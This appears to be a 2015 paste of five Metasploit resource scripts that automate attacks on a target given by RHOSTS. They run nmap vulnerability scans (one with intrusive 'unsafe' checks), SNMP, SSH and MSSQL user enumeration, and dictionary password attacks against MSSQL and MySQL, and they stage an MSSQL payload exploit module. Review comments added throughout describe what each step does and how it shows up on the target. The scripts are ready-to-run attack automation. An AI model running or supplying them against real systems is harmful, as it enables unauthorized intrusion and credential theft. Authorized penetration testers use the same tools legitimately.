r00t-3xp10it

[ scanner.rc ] common-services -> scanner/exploiter

Feb 27th, 2015
  1. # The following resource file (scanner.rc) requires the user to set RHOSTS globally
  2. # using: setg RHOSTS 192.168.1.68 (target IP) before launching the resource file.
  3. # It uses the 'db_nmap' command to save the scan results in the Metasploit database.
  4. # The <ruby> block uses nmap to scan for vulnerabilities in the SMB and Samba protocols;
  5. # the results are stored in 'services' and 'vulns'. After the </ruby> tag, the resource file
  6. # will use the results contained in the DB to run post-exploitation modules.
  7. #
  8. # before launching the resource file:  msf > setg RHOSTS <target target target>
  9. # run the resource file:  msf > resource scanner.rc
  10. # unset the global variable: msf > unsetg RHOSTS
  11. # clean the msf database: msf > hosts -d
  12.  
  13.  
  14. [scanner.rc]
  15. -----------------------------------------------------------------------------------------------------------------------
  16. <ruby>
      # Runs nmap through db_nmap, so results are written to the Metasploit database.
      # -sU and -sS: UDP and TCP SYN scans of UDP 135 and TCP 139,445; -Pn skips host discovery;
      # -O attempts OS detection; -n disables DNS resolution.
      # The target list is interpolated from the global RHOSTS datastore value.
      # NOTE(review): --script-args=unsafe=1 enables the intrusive smb-check-vulns checks, which
      # the nmap documentation describes as able to crash an unpatched service; this is not a
      # passive probe and will be visible to the target.
  17. run_single("db_nmap -sU -sS -Pn -O -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
  18. </ruby>
      # Each 'use' + 'run' pair below executes one SNMP auxiliary scanner module.
      # NOTE(review): the nmap scan above covers only ports 135/139/445, not SNMP; these modules
      # presumably take their targets from the global RHOSTS, not from the scan results - confirm.
  19. use auxiliary/scanner/snmp/snmp_enum
  20. run
  21. use auxiliary/scanner/snmp/snmp_enumusers
  22. run
  23. use auxiliary/scanner/snmp/snmp_enumshares
  24. run
      # Print the hosts and services recorded in the database so far.
  25. hosts
  26. services
      # snmp_login is only selected and its options displayed; no 'run' follows it.
  27. use auxiliary/scanner/snmp/snmp_login
  28. show options
  29. -----------------------------------------------------------------------------------------------------------------------
  30.  
  31.  
  32.  
  33. # The following resource file (scanner[multi].rc) requires the user to set RHOSTS globally
  34. # using: setg RHOSTS 192.168.1.68 (target IP) and USER_FILE (path to dictionary file)
  35. # before launching the resource file. It uses the 'db_nmap' command to save the scan results
  36. # in the Metasploit database. The <ruby> block uses nmap to scan for vulnerabilities in the
  37. # protocols: telnet | ssh | mysql | mssql | pop3 | ftp. After the </ruby> tag, the
  38. # resource file will use the results contained in the DB to run auxiliary modules.
  39. #
  40. # before launching the resource file:  msf > setg RHOSTS <target target target>
  41. # before launching the resource file:  msf > setg USER_FILE /root/brute-force.txt
  42. # run the resource file:  msf > resource scanner[multi].rc
  43. # unset the global variable: msf > unsetg RHOSTS
  44. # unset the global variable: msf > unsetg USER_FILE
  45. # clean the msf database: msf > hosts -d
  46.  
  47.  
  48. [scanner[multi].rc]
  49. -----------------------------------------------------------------------------------------------------------------------
  50. <ruby>
  51. run_single("db_nmap -T3 -sS -Pn --script vuln,banner.nse,smb-check-vulns.nse,dns-brute.nse,ssh-hostkey.nse,ip-geolocation-geoplugin.nse --open --reason -p 21,22,23,995,1433,3306,5432 #{framework.datastore['RHOSTS']}")
  52. </ruby>
  53.  
  54. use auxiliary/scanner/telnet/telnet_version
  55. run
  56. use auxiliary/scanner/mysql/mysql_version
  57. run
  58. use auxiliary/scanner/pop3/pop3_version
  59. run
  60. use auxiliary/scanner/ftp/ftp_version
  61. run
  62. use auxiliary/scanner/ftp/anonymous
  63. run
  64. use auxiliary/scanner/ssh/ssh_version
  65. run
  66. use auxiliary/scanner/ssh/ssh_enumusers
  67. run
  68. use auxiliary/scanner/mssql/mssql_ping
  69. run
  70. hosts
  71. services
  72. creds
  73. -----------------------------------------------------------------------------------------------------------------------
  74.  
  75.  
  76.  
  77. # The following resource file (scanner[ms-sql].rc) requires the user to set RHOSTS globally
  78. # using: setg RHOSTS 192.168.1.68 (target IP) and PASS_FILE (path to dictionary file)
  79. # before launching the resource file. It uses the 'db_nmap' command to save the scan results
  80. # in the Metasploit database. The <ruby> block uses nmap to scan for vulnerabilities in the
  81. # protocol: | mssql | and tries to exploit them using nmap. After the </ruby> tag, the
  82. # resource file will use the results contained in the DB to run auxiliary modules.
  83. #
  84. # before launching the resource file:  msf > setg RHOSTS <target target target>
  85. # before launching the resource file:  msf > setg MSSQL_PASS_FILE /root/brute.txt
  86. # run the resource file:  msf > resource scanner[ms-sql].rc
  87. # unset the global variable: msf > unsetg RHOSTS
  88. # unset the global variable: msf > unsetg MSSQL_PASS_FILE
  89. # clean the msf database: msf > hosts -d
  90.  
  91.  
  92. [scanner[ms-sql].rc]
  93. -----------------------------------------------------------------------------------------------------------------------
  94. <ruby>
      # First scan: SYN scan of TCP 1433 with OS detection, the 'vuln' script category and the
      # ms-sql information / empty-password / broadcast-discovery scripts; results go to the
      # Metasploit database via db_nmap.
      # NOTE(review): ip-geolocation-geoplugin.nse queries an external web service, so the
      # scanned IPs are disclosed to a third party.
  95. run_single("db_nmap -T3 -sS -O -Pn --script vuln,ms-sql-info.nse,ms-sql-empty-password.nse,broadcast-ms-sql-discover.nse,ip-geolocation-geoplugin.nse --open --reason -p 1433 #{framework.datastore['RHOSTS']}")
      # Second scan: online password guessing against MSSQL with nmap's ms-sql-brute script.
      # On the server this appears as a burst of failed logins from a single source
      # (SQL Server typically records these as error 18456).
  96. run_single("db_nmap --script ms-sql-brute.nse --script-args userdb=brute.txt,passdb=brute.txt -p 1433 #{framework.datastore['RHOSTS']}")
  97. </ruby>
      # mssql_ping discovers instances; mssql_login attempts logins. Both are executed.
  98. use auxiliary/scanner/mssql/mssql_ping
  99. run
  100. use auxiliary/scanner/mssql/mssql_login
  101. run
      # Print the hosts and services recorded in the database.
  102. hosts
  103. services
      # The exploit module is only selected and its options displayed; no 'run'/'exploit' follows.
  104. use exploit/windows/mssql/mssql_payload
  105. show options
  106.  
  107. -----------------------------------------------------------------------------------------------------------------------
  108.  
  109. # The following resource file (scanner[ssh].rc) requires the user to set RHOSTS globally
  110. # using: setg RHOSTS 192.168.1.68 (target IP) and USERPASS_FILE (path to dictionary file)
  111. # before launching the resource file. It uses the 'db_nmap' command to save the scan results
  112. # in the Metasploit database. The <ruby> block uses nmap to scan for vulnerabilities in the
  113. # protocol: | ssh | and tries to exploit them using nmap. After the </ruby> tag, the
  114. # resource file will use the results contained in the DB to run auxiliary modules.
  115. #
  116. # before launching the resource file:  msf > setg RHOSTS <target target target>
  117. # before launching the resource file:  msf > setg USER_FILE /root/brute.txt
  118. # before launching the resource file:  msf > setg USERPASS_FILE /root/brute.txt
  119. # run the resource file:  msf > resource scanner[ssh].rc
  120. # unset the global variable: msf > unsetg RHOSTS
  121. # unset the global variable: msf > unsetg USER_FILE
  122. # unset the global variable: msf > unsetg USERPASS_FILE
  123. # clean the msf database: msf > hosts -d
  124.  
  125.  
  126. [scanner[ssh].rc]
  127. -----------------------------------------------------------------------------------------------------------------------
  128. <ruby>
       # SYN scan of TCP 22 with OS detection, the 'vuln' script category, host-key collection
       # and algorithm enumeration; results go to the Metasploit database via db_nmap.
       # NOTE(review): ip-geolocation-geoplugin.nse queries an external web service, so the
       # scanned IPs are disclosed to a third party.
  129. run_single("db_nmap -T3 -sS -Pn -O --script vuln,ssh-hostkey.nse,ssh2-enum-algos.nse,ip-geolocation-geoplugin.nse --open --reason -p 22 #{framework.datastore['RHOSTS']}")
  130. </ruby>
       # Banner collection, then an attempt to determine which SSH usernames exist.
  131. use auxiliary/scanner/ssh/ssh_version
  132. run
  133. use auxiliary/scanner/ssh/ssh_enumusers
  134. run
       # Print the hosts and services recorded in the database.
  135. hosts
  136. services
       # ssh_login is only selected and its options displayed; no 'run' follows it.
  137. use auxiliary/scanner/ssh/ssh_login
  138. show options
  139. -----------------------------------------------------------------------------------------------------------------------
  140.  
  141. # The following resource file (scanner[mysql].rc) requires the user to set RHOSTS globally
  142. # using: setg RHOSTS 192.168.1.68 (target IP) and PASS_FILE and USER_FILE (path to dictionary file)
  143. # before launching the resource file. It uses the 'db_nmap' command to save the scan results
  144. # in the Metasploit database. The <ruby> block uses nmap to scan for vulnerabilities in the
  145. # protocol: | mysql | and tries to exploit them using nmap. After the </ruby> tag, the
  146. # resource file will use the results contained in the DB to run auxiliary modules.
  147. #
  148. # before launching the resource file:  msf > setg RHOSTS <target target target>
  149. # before launching the resource file:  msf > setg USER_FILE /root/brute.txt
  150. # before launching the resource file:  msf > setg PASS_FILE /root/brute.txt
  151. # run the resource file:  msf > resource scanner[mysql].rc
  152. # unset the global variable: msf > unsetg RHOSTS
  153. # unset the global variable: msf > unsetg USER_FILE
  154. # unset the global variable: msf > unsetg PASS_FILE
  155. # clean the msf database: msf > hosts -d
  156.  
  157.  
  158. [scanner[mysql].rc]
  159. -----------------------------------------------------------------------------------------------------------------------
  160. <ruby>
       # SYN scan of TCP 3306 with OS detection, the 'vuln' script category and the mysql
       # info / enumeration / empty-password scripts; results go to the Metasploit database.
       # NOTE(review): ip-geolocation-geoplugin.nse queries an external web service, so the
       # scanned IPs are disclosed to a third party.
  161. run_single("db_nmap -T3 -sS -Pn -O --script vuln,mysql-info.nse,mysql-enum.nse,mysql-empty-password.nse,ip-geolocation-geoplugin.nse --open --reason -p 3306 #{framework.datastore['RHOSTS']}")
  162. </ruby>
       # mysql_version collects the server version; mysql_login attempts logins. Both are executed.
       # The login attempts show up server-side as repeated access-denied errors from one source.
  163. use auxiliary/scanner/mysql/mysql_version
  164. run
  165. use auxiliary/scanner/mysql/mysql_login
  166. run
       # Print the hosts and services recorded in the database.
  167. hosts
  168. services
       # mysql_enum is only selected and its options displayed; no 'run' follows it.
  169. use auxiliary/admin/mysql/mysql_enum
  170. show options
  171. -----------------------------------------------------------------------------------------------------------------------